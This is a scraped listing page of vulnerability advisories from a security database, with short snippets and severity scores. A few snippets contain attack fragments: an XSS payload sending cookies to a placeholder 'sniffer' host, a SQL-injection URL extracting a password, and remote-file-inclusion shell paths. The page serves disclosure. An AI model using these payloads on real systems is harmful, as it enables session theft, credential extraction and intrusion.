Securityvulns: Most viewed

47153 matches found

securityvulns | added 2011/05/30 12:0 a.m. | 100 views

CSRF and XSS vulnerabilities in ADSL modem Callisto 821+

Hello 3APA3A! I want to warn you about security vulnerabilities in ADSL modem Callisto 821+ SI2000 Callisto821+ Router. These are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities. These attacks should be conducted on modem owner, which is logged into control panel. Taking into...

0.3 AI score
Exploits: 0

securityvulns | added 2010/12/09 12:0 a.m. | 100 views

Linux kernel exploit

Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- /* Linux Kernel <= 2.6.37 local privilege escalation by Dan Rosenberg...

6.2 CVSS | 0.2 AI score | 0.02655 EPSS
Exploits: 11

securityvulns | added 2010/09/15 12:0 a.m. | 100 views

Microsoft Security Bulletin MS10-068 - Important Vulnerability in Local Security Authority Subsystem Service Could Allow Elevation of Privilege (983539)

Microsoft Security Bulletin MS10-068 - Important Vulnerability in Local Security Authority Subsystem Service Could Allow Elevation of Privilege (983539) Published: September 14, 2010 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability ...

9 CVSS | 1.3 AI score | 0.14361 EPSS
Exploits: 0

securityvulns | added 2010/04/05 12:0 a.m. | 100 views

VUPEN Security Research - Sun Java JDK/JRE AWT Library Invalid Index Vulnerability

VUPEN Security Research - Sun Java JDK/JRE AWT Library Invalid Index Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND "Java is a programming language and computing platform released by Sun Microsystems. It is the underlying technology that powers...

0.5 AI score
Exploits: 0

securityvulns | added 2008/10/29 12:0 a.m. | 100 views

Secunia Research: Trend Micro OfficeScan CGI Parsing Buffer Overflows

Secunia Research 22/10/2008 - Trend Micro OfficeScan CGI Parsing Buffer Overflows - Table of Contents Affected...

10 CVSS | 0.8 AI score | 0.18406 EPSS
Exploits: 6

securityvulns | added 2008/08/21 12:0 a.m. | 100 views

Null Byte Local file Inclusion in FAR - PHP Project version:1.0

est.2007 forum.darkc0de.com Web Application: FAR - PHP Project version:1.0 Vendor's Address: www.far-php.ro Author: Beenu Arora Address: www.beenuarora.com Python Dark Scripts:...

6.8 AI score
Exploits: 0

securityvulns | added 2008/08/04 12:0 a.m. | 100 views

America's army game server DoS

Invalid assert on network traffic parsing...

4 AI score
Exploits: 0 | References: 1

securityvulns | added 2008/02/20 12:0 a.m. | 100 views

WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN Vendor: http://woltlab.de ::Proof of Concept http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, SELECT password FROM wcf1user WHERE userID=1 AND...

Exploits: 0

securityvulns | added 2007/06/01 12:0 a.m. | 100 views

[ GLSA 200705-23 ] Sun JDK/JRE: Multiple vulnerabilities

Gentoo Linux Security Advisory GLSA 200705-23 http://security.gentoo.org/ Severity:...

10 CVSS | 7.2 AI score | 0.18185 EPSS
Exploits: 0

securityvulns | added 2007/05/19 12:0 a.m. | 100 views

[CVE-2007-1355] Tomcat documentation XSS vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-1355: Tomcat documentation XSS vulnerabilities Severity: Moderate Cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.23 Tomcat...

4.3 CVSS | 0.5 AI score | 0.58246 EPSS
Exploits: 2

securityvulns | added 2007/04/19 12:0 a.m. | 100 views

Web Slider 0.6(path)Remote File Inclusion Vulnerabilities

Web Slider 0.6(path)Remote File Inclusion Vulnerabilities D.Script: http://sourceforge.net/projects/webslider/ Discovered by: GolDM = Mahmoodali Homepage: http://Www.Tryag.Com/cc Exploit:Path/index.php?path=Shell Exploit:Path/modules/pdf.php?path=Shell Exploit:Path/plugins/highlight.php?path=Shell...

0.4 AI score
Exploits: 0

securityvulns | added 2007/04/13 12:0 a.m. | 100 views

[Full-disclosure] [OPENADS-SA-2007-003] Openads 2.0.11 vulnerability fixed

Openads security advisory OPENADS-SA-2007-003 Advisory ID: OPENADS-SA-2007-003 Date: 2007-Apr-11 Security risk: medium risk Applications affected:...

0.1 AI score
Exploits: 0

securityvulns | added 2007/01/09 12:0 a.m. | 100 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

7.8 CVSS | 1.5 AI score | 0.101 EPSS
Exploits: 4 | References: 17 | Affected Software: 8

securityvulns | added 2006/10/21 12:0 a.m. | 100 views

[DRUPAL-SA-2006-024] Drupal 4.6.10 / 4.7.4 fixes multiple XSS issues

Drupal security advisory DRUPAL-SA-2006-024 Project: Drupal core Date: 2006-Oct-18 Security risk: Moderately critical Exploitable from: Remot...

Exploits: 0

securityvulns | added 2006/07/25 12:0 a.m. | 100 views

XSS in Devium CMS 1.5

Advisory: XSS in Devium CMS 1.5 Home Page: http://www.devium.net/ Vulnerability: XSS in the guestbook. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Vulnerability: Installation path disclosure in the admin panel:...

0.2 AI score
Exploits: 0

securityvulns | added 2006/07/24 12:0 a.m. | 100 views

VBZooM <=V1.11 "sub-join.php" SQL Injection

Discovered By: C.B.B.L CrAzY CrAcKeR,Breeeeh,BoNy-m,LiNuX rOOt Search: POWERED BY VBZooM V1.11 Example:- /sub-join.php?UserID=SQL Injection...

2.8 AI score
Exploits: 0

securityvulns | added 2004/12/17 12:0 a.m. | 100 views

iDEFENSE Security Advisory 12.16.04: MPlayer Bitmap Parsing Remote Heap Overflow Vulnerability

MPlayer Bitmap Parsing Remote Heap Overflow Vulnerability iDEFENSE Security Advisory 12.16.04 http://www.idefense.com/application/poi/display?id=168 December 16, 2004 I. BACKGROUND MPlayer is a movie player for Linux that also runs on many other Unices, and non-x86 CPUs. It plays most MPEG, VOB,...

0.6 AI score
Exploits: 0

securityvulns | added 2004/03/01 12:0 a.m. | 100 views

InnoMedia VideoPhone protection bypass

No description provided...

2.5 AI score
Exploits: 0 | References: 1 | Affected Software: 1

securityvulns | added 2000/06/07 12:0 a.m. | 100 views

Security Bulletin (MS00-039)

Microsoft Security Bulletin MS00-039 Patch Available for "SSL Certificate Validation" Vulnerabilities Originally posted: June 05, 2000 Summary Microsoft has released a patch that eliminates two security vulnerabilities in Microsoft(r) Internet...

Exploits: 0

securityvulns | added 2000/04/03 12:0 a.m. | 100 views

Security Bulletin (MS00-022)

Patch Available for "XLM Text Macro" Vulnerability Originally Posted: April 03, 2000 Summary Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Excel. The vulnerability could allow a macro to run without generating the expected security warning. Frequent...

6.8 AI score
Exploits: 0

securityvulns | added 2015/08/17 12:0 a.m. | 99 views

APPLE-SA-2015-08-13-3 iOS 8.4.1

APPLE-SA-2015-08-13-3 iOS 8.4.1 iOS 8.4.1 is now available and addresses the following: AppleFileConduit Available for: iPhone 4s and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted afc command may allow access to protected parts of the filesystem...

9.3 CVSS | 0.4 AI score | 0.13322 EPSS
Exploits: 5

securityvulns | added 2015/02/11 12:0 a.m. | 99 views

[SECURITY] [DSA 3155-1] postgresql-9.1 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Debian Security Advisory DSA-3155-1 [email protected] http://www.debian.org/security/ Luciano Bello February 06, 2015 http://www.debian.org/security/faq -...

1.4 AI score | 0.05533 EPSS
Exploits: 0

securityvulns | added 2014/12/01 12:0 a.m. | 99 views

[ MDVSA-2014:237 ] perl-Mojolicious

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:237 http://www.mandriva.com/en/support/security/ Package : perl-Mojolicious Date : November 28, 2014 Affected: Business Server 1.0 Problem Description: Updated perl-Mojolicious package fixes security...

0.1 AI score
Exploits: 0

securityvulns | added 2014/09/21 12:0 a.m. | 99 views

Apple Mac OS X / OS X Server multiple security vulnerabilities

Privilege escalation, multiple memory corruptions on different formats parsing, information leakage, DoS, protection bypass, multiple vulnerabilities in 3rd parties components...

10 CVSS | 2.8 AI score | 0.99977 EPSS
Exploits: 31 | References: 4 | Affected Software: 2

securityvulns | added 2014/05/15 12:0 a.m. | 99 views

[SECURITY] [DSA 2926-1] linux security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-2926-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 12, 2014 http://www.debian.org/security/faq -...

7.2 CVSS | 0.9 AI score | 0.22475 EPSS
Exploits: 14

securityvulns | added 2014/05/04 12:0 a.m. | 99 views

[SECURITY] [DSA 2888-1] ruby-actionpack-3.2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-2888-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff March 27, 2014 http://www.debian.org/security/faq -...

6.4 CVSS | 1.6 AI score | 0.207 EPSS
Exploits: 3

securityvulns | added 2014/05/04 12:0 a.m. | 99 views

[USN-2172-1] CUPS vulnerability

Ubuntu Security Notice USN-2172-1 April 24, 2014 cups vulnerability A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...

4.3 CVSS | 0.4 AI score | 0.01626 EPSS
Exploits: 0

securityvulns | added 2014/04/07 12:0 a.m. | 99 views

ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities

ESA-2014-009.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2014-009: RSA BSAFE® SSL-J Multiple Vulnerabilities EMC Identifier: ESA-2014-009 CVE Identifier: CVE-2011-1473, CVE-2014-0625, CVE-2014-0626, CVE-2014-0627 Severity Rating: CVSS v2 Base Score: See below for individual scores...

5 CVSS | 0.5 AI score | 0.67703 EPSS
Exploits: 1

securityvulns | added 2014/03/13 12:0 a.m. | 99 views

[USN-2126-1] PHP vulnerabilities

Ubuntu Security Notice USN-2126-1 March 03, 2014 php5 vulnerabilities A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

6.8 CVSS | 0.4 AI score | 0.06732 EPSS
Exploits: 3

securityvulns | added 2014/02/28 12:0 a.m. | 99 views

Barracuda Bug Bounty #36 Firewall - Client Side Exception Handling Web Vulnerability

Document Title: Barracuda Bug Bounty #36 Firewall - Client Side Exception Handling Web Vulnerability References Source: http://www.vulnerability-lab.com/getcontent.php?id=1102 Barracuda Networks Security ID BNSEC: BNSEC-2398...

0.1 AI score
Exploits: 0

securityvulns | added 2014/02/11 12:0 a.m. | 99 views

Microsoft Windows multiple security vulnerabilities

XML services information leakage, IPv6 DoS, Direct2D memory corruption, .Net privilege escalation, VBScript code execution...

9.3 CVSS | 3.1 AI score | 0.69801 EPSS
Exploits: 13 | Affected Software: 1

securityvulns | added 2014/02/10 12:0 a.m. | 99 views

[USN-2099-1] Perl vulnerability

Ubuntu Security Notice USN-2099-1 February 05, 2014 perl vulnerability A security issue affects these releases of Ubuntu and its derivatives: -...

7.5 CVSS | 0.2 AI score | 0.61604 EPSS
Exploits: 13

securityvulns | added 2014/02/03 12:0 a.m. | 99 views

Multiple Vulnerabilities in Eventum

Advisory ID: HTB23198 Product: Eventum Vendor: Eventum Development Team Vulnerable Versions: 2.3.4 and probably prior Tested Version: 2.3.4 Advisory Publication: January 22, 2014 without technical details Vendor Notification: January 22, 2014 Vendor Patch: January 24, 2014 Public Disclosure:...

9.3 CVSS | 0.2 AI score | 0.10683 EPSS
Exploits: 6

securityvulns | added 2013/12/23 12:0 a.m. | 99 views

[USN-2058-1] curl vulnerability

Ubuntu Security Notice USN-2058-1 December 18, 2013 curl vulnerability A security issue affects these releases of Ubuntu and its derivatives: -...

4 CVSS | 0.6 AI score | 0.02761 EPSS
Exploits: 0

securityvulns | added 2013/05/06 12:0 a.m. | 99 views

[SQLi] vBilling for FreeSWITCH

vBilling for FreeSWITCH. http://blaszczakm.blogspot.com/2013/04/vbilling-freeswitch-sqli.html Michal Blaszczak 1 SQL Injection reset password any SIP account file: controllers/customer.php $sql2 = "UPDATE directoryparams SET paramvalue = '".$newpassword."' WHERE directoryid = '".$recordid."' "; 2...

0.5 AI score
Exploits: 0

securityvulns | added 2013/04/02 12:0 a.m. | 99 views

[USN-1784-1] libxslt vulnerability

Ubuntu Security Notice USN-1784-1 April 02, 2013 libxslt vulnerability A security issue affects these releases of Ubuntu and its derivatives: -...

5 CVSS | 0.4 AI score | 0.04286 EPSS
Exploits: 1

securityvulns | added 2013/02/04 12:0 a.m. | 99 views

[KIS-2013-01] DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability

DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability • Software Link: http://dleviet.com/ • Affected Version: 9.7 only. • Vulnerability Description: Th...

7.5 CVSS | 0.3 AI score | 0.40465 EPSS
Exploits: 9

securityvulns | added 2012/12/11 12:0 a.m. | 99 views

Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework

Advisory ID: HTB23127 Product: Smartphone Pentest Framework SPF Vendor: Bulb Security LLC Vulnerable Versions: 0.1.3, 0.1.4 and probably prior Tested Versions: 0.1.3, 0.1.4 Vendor Notification: November 19, 2012 Public Disclosure: December 10, 2012 Vulnerability Type: OS Command Injection CWE-78...

6.8 CVSS | 0.6 AI score | 0.09296 EPSS
Exploits: 5

securityvulns | added 2012/11/02 12:0 a.m. | 99 views

PrestaShop <= 1.5.1 Persistent XSS

PrestaShop <= 1.5.1 Persistent XSS Tested under: Firefox, Chrome and Safari latest versions Discover Credits: David Sopas - [email protected] | @dsopas | davidsopas.com/labs Original link: http://davidsopas.com/labs/prestashopxss.txt Description: PrestaShop is the most reliable and flexible...

6.3 AI score
Exploits: 0

securityvulns | added 2012/10/05 12:0 a.m. | 99 views

[security bulletin] HPSBMU02815 SSRT100715 rev.3 - HP SiteScope SOAP Security Issues, Remote Disclosure of Information, Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03489683 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03489683 Version: 3 HPSBMU02815...

10 CVSS | 0.5 AI score | 0.6022 EPSS
Exploits: 6

securityvulns | added 2012/07/23 12:0 a.m. | 99 views

WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities

Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed...

5.8 AI score
Exploits: 0

securityvulns | added 2012/06/13 12:0 a.m. | 99 views

ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-090 June 8, 2012 - -- CVE ID: CVE-2012-0297 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected...

10 CVSS | 0.72596 EPSS
Exploits: 22

securityvulns | added 2012/04/23 12:0 a.m. | 99 views

Microsoft Windows multiple security vulnerabilities

MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability...

9.3 CVSS | 2.7 AI score | 0.99966 EPSS
Exploits: 14 | References: 1 | Affected Software: 1

securityvulns | added 2012/03/19 12:0 a.m. | 99 views

Brute Force and XSS vulnerabilities in Webglimpse

Hello 3APA3A! Following the numerous earlier Cross-Site Scripting, Full path disclosure, Directory Traversal and Authorization bypass vulnerabilities in Webglimpse SecurityVulns ID: 9436, 9443, 9778, 9876, I am informing you of new vulnerabilities I have found in Webglimpse. These are Brute Force and Cross-Site...

6.4 AI score
Exploits: 0

securityvulns | added 2012/03/18 12:0 a.m. | 99 views

Cisco Security Advisory: Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability Advisory ID: cisco-sa-20120314-fwsm Revision 1.0 For Public Release 2012 March 14 16:00 UTC GMT...

7.8 CVSS | 0.7 AI score | 0.02076 EPSS
Exploits: 0

securityvulns | added 2011/12/05 12:0 a.m. | 99 views

MVSA-11-013 - EllisLab xss_clean Filter Bypass - ExpressionEngine and CodeIgniter

CVE: CVE-2011-4025 Vendor: EllisLab Products: ExpressionEngine 2.2.2, CodeIgniter 2.0.3 Vulnerabilities: xss_clean filter bypass, leading to Cross-Site Scripting (XSS) Risk: High Attack Vector: From Remote Reference: http://secureappdev.blogspot.com/2011/11/ellislab-xssclean-filter-bypass.html 1...

0.2 AI score
Exploits: 2

securityvulns | added 2011/10/20 12:0 a.m. | 99 views

ZDI-11-290 : Microsoft Internet Explorer SetExpandedClipRect Remote Code Execution Vulnerability

ZDI-11-290 : Microsoft Internet Explorer SetExpandedClipRect Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-290 October 15, 2011 - -- CVE ID: CVE-2011-2001 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Microsoft - -- Affected Products:...

9.3 CVSS | 0.4 AI score | 0.71802 EPSS
Exploits: 5

securityvulns | added 2011/09/09 12:0 a.m. | 99 views

Security bypass vulnerability in MyBB

Hello 3APA3A! I want to warn you about security bypass vulnerability in MyBB, which allows to bypass protection against Brute Force and conduct Brute Force attacks. In August in my article Bypassing captchas and blocking at web sites http://websecurity.com.ua/5334/ I wrote about vulnerability in...

Exploits: 0

securityvulns | added 2011/08/01 12:0 a.m. | 99 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

8.3 CVSS | 1.6 AI score | 0.10046 EPSS
Exploits: 7 | References: 29 | Affected Software: 9

securityvulns | added 2011/06/29 12:0 a.m. | 99 views

Multiple vulnerabilities in Open-Realty

Vulnerability ID: HTB23023 Reference: http://www.htbridge.ch/advisory/multiplevulnerabilitiesinopenrealty.html Product: Open-Realty Vendor: Transparent Technologies, Inc. http://www.open-realty.org/ Vulnerable Version: 3.1.5 and probably prior Tested on: 3.1.5 Vendor Notification: 07 June 2011...

0.2 AI score
Exploits: 0

Total number of security vulnerabilities: 5000